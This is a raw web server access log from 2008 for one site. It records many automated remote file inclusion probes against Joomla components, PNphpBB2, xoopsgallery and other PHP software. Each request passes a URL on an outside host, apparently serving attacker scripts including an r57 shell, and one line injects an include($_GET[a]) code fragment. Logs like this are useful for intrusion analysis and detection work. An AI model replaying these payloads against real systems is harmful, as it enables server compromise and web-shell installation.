69.65.42.208 - - [29/Nov/2008:08:07:52 -0800] "GET /logs/access_081107.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://125.214.65.34/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.816" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:08:17 -0800] "GET /logs/access_080825.log//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.55.13.210 - - [29/Nov/2008:08:08:53 -0800] "GET /logs/access_081024.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:09:00 -0800] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:09:01 -0800] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.160.185.20 - - [29/Nov/2008:08:09:09 -0800] "GET /logs/access_080329.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.160.185.20 - - [29/Nov/2008:08:09:09 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.160.185.20 - - [29/Nov/2008:08:09:09 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.160.185.20 - - [29/Nov/2008:08:09:09 -0800] "GET /logs/access_080308.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.pass100.co.kr/LykBoard/image.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.215.243.76 - - [29/Nov/2008:08:09:12 -0800] "GET /logs/access_071026.log//ak07//pixlie.php?root=http://geocities.com/blade_tea/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:08:09:21 -0800] "GET /logs/access_080316.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:08:09:22 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:08:09:23 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
121.170.11.100 - - [29/Nov/2008:08:09:35 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:09:51 -0800] "GET /logs/access_080401.log%20%20/index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:10:41 -0800] "GET /logs/access_080629.log/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:10:42 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
194.187.193.9 - - [29/Nov/2008:08:10:45 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.133.156 - - [29/Nov/2008:08:10:48 -0800] "GET /?sourcedir=http://gxmag.com/poll/id????? HTTP/1.1" 200 94627 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.51 - - [29/Nov/2008:08:10:49 -0800] "GET /logs/access_081007.log/browse.php/header.php?prefix=http://www.geocities.com/hidayatkhoir/idq.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.9.154.74 - - [29/Nov/2008:08:11:12 -0800] "GET /logs/access_080408.log/errors.php?error=http://gxmag.com/poll/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [29/Nov/2008:08:11:12 -0800] "GET /errors.php?error=http://gxmag.com/poll/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.9.154.74 - - [29/Nov/2008:08:11:12 -0800] "GET /logs/errors.php?error=http://gxmag.com/poll/id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:11:58 -0800] "GET /logs/access_080831.log//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:11:59 -0800] "GET /logs//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 200 75743 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:11:59 -0800] "GET /?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 200 94851 "-" "Mozilla/5.0" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:12:00 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:12:04 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:12:04 -0800] "GET /logs/access_080825.log//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:08:12:16 -0800] "GET /logs/access_081105.log//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:08:12:17 -0800] "GET /administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.170.60.110 - - [29/Nov/2008:08:12:18 -0800] "GET /logs//administrator/components/com_googlebase/admin.googlebase.php?mosConfig_absolute_path=http://georgek.ecommerce.hct.ac.ae/sharjahlevel7/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:08:12:52 -0800] "GET /logs/access_080720.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:08:12:52 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:08:12:53 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:13:45 -0800] "GET /logs/access_080507.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:13:46 -0800] "GET /logs/access_080130.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:13:48 -0800] "GET /logs/access_080421.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:13:55 -0800] "GET /logs/access_080307.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:13:55 -0800] "GET /logs/access_080307.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:13:55 -0800] "GET /logs/access_080421.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.207.57.39 - - [29/Nov/2008:08:13:58 -0800] "GET /logs/access_080421.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.78.145 - - [29/Nov/2008:08:14:01 -0800] "GET /logs/access_080703.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [29/Nov/2008:08:14:01 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [29/Nov/2008:08:14:02 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 200 95059 "-" "libwww-perl/5.810" "www.dmulk.com"
72.29.78.145 - - [29/Nov/2008:08:14:02 -0800] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.doggytown.de/components/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
220.80.108.77 - - [29/Nov/2008:08:14:55 -0800] "GET /logs/access_080703.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://morebb.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.64.3.50 - - [29/Nov/2008:08:15:07 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.evilc0der.com/r57.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
217.64.3.50 - - [29/Nov/2008:08:15:08 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.evilc0der.com/r57.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
64.15.131.162 - - [29/Nov/2008:08:15:16 -0800] "GET /index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 200 95025 "-" "libwww-perl/5.808" "www.dmulk.com"
121.170.11.100 - - [29/Nov/2008:08:15:37 -0800] "GET /logs/access_080930.log//NuclearBB/tasks/send_queued_emails.php?root_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [29/Nov/2008:08:15:38 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.170.11.100 - - [29/Nov/2008:08:15:38 -0800] "GET /logs//NuclearBB/tasks/send_queued_emails.php?root_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:16:05 -0800] "GET /logs/aides/index.php?page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:16:05 -0800] "GET /aides/index.php?page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.38.12.178 - - [29/Nov/2008:08:16:05 -0800] "GET /logs/access_080223.log/aides/index.php?page=http://www.samilglass.com/images/v6id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:16:11 -0800] "GET /logs/access_080520.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:16:11 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:16:11 -0800] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:16:23 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:16:23 -0800] "GET /logs/access_071103.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:16:23 -0800] "GET /logs/access_071125.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:16:23 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.131.162 - - [29/Nov/2008:08:17:04 -0800] "GET /logs/access_080506.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.131.162 - - [29/Nov/2008:08:17:06 -0800] "GET /index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 200 95041 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:09 -0800] "GET /modifyform.html?code=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:09 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:09 -0800] "GET /logs/modifyform.html?code=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:13 -0800] "GET /logs/access_080102.log/modifyform.html?code=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.15.131.162 - - [29/Nov/2008:08:17:14 -0800] "GET /logs//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:20 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:20 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:20 -0800] "GET /logs/access_080525.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:24 -0800] "GET /logs/access_080807.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:26 -0800] "GET /logs/access_080525.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:26 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:26 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:17:50 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:18:05 -0800] "GET /logs/access_080330.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:18:33 -0800] "GET /logs/access_080714.log//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
80.238.225.165 - - [29/Nov/2008:08:18:33 -0800] "GET /logs/access.log//?sIncPath=http://web8.server5.northern-solutions.de/klinken/modules/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.159.26.192 - - [29/Nov/2008:08:18:53 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://automotrizozcar.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
89.111.180.85 - - [29/Nov/2008:08:18:53 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.111.180.85 - - [29/Nov/2008:08:18:54 -0800] "GET /administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.dalgakiran.su/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:18:59 -0800] "GET /logs/access_080828.log/index.php?sayfa=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:19:02 -0800] "GET /index.php?sayfa=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 200 94842 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [29/Nov/2008:08:19:03 -0800] "GET /logs/index.php?sayfa=http://www.cbfportugal.com/modules/xt_conteudo/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:19:06 -0800] "GET /logs/access_080303.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.22.82.133 - - [29/Nov/2008:08:19:27 -0800] "GET /logs/access_080724.log/index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.theatrelinks.com/.s/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.49.145.16 - - [29/Nov/2008:08:19:41 -0800] "GET /logs/access_080828.log/errors.php?error=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.49.145.16 - - [29/Nov/2008:08:19:58 -0800] "GET /logs/access_080223.log/errors.php?error=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.15.131.162 - - [29/Nov/2008:08:20:04 -0800] "GET /logs/access_080507.log//index.php?option=com_mtree&task=listcats&cat_id=1792&Itemid=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.159.26.192 - - [29/Nov/2008:08:20:18 -0800] "GET /logs/access_080525.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://automotrizozcar.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:20:25 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:20:30 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:20:34 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:20:39 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:20:46 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.132.52.239 - - [29/Nov/2008:08:20:50 -0800] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://vn-art.com/components/com_joomfish/includes/idperkosa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.148.87 - - [29/Nov/2008:08:20:52 -0800] "GET /errors.php?error=http://labugis.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
74.208.148.87 - - [29/Nov/2008:08:20:52 -0800] "GET /logs//errors.php?error=http://labugis.com/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
121.170.11.100 - - [29/Nov/2008:08:21:00 -0800] "GET /logs/access_080409.log//NuclearBB/tasks/send_queued_emails.php?root_path=http://www.100nx-fanpage.de/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.159.26.192 - - [29/Nov/2008:08:21:55 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.ctg.su/system/ec.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:21:58 -0800] "GET /logs/access_080507.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:21:59 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
85.93.165.132 - - [29/Nov/2008:08:22:00 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://gxmag.com/poll/id????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:22:56 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.135.71.20 - - [29/Nov/2008:08:22:56 -0800] "GET /logs/access_080831.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://neu_2.lasrv-1.de/web/.v6/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
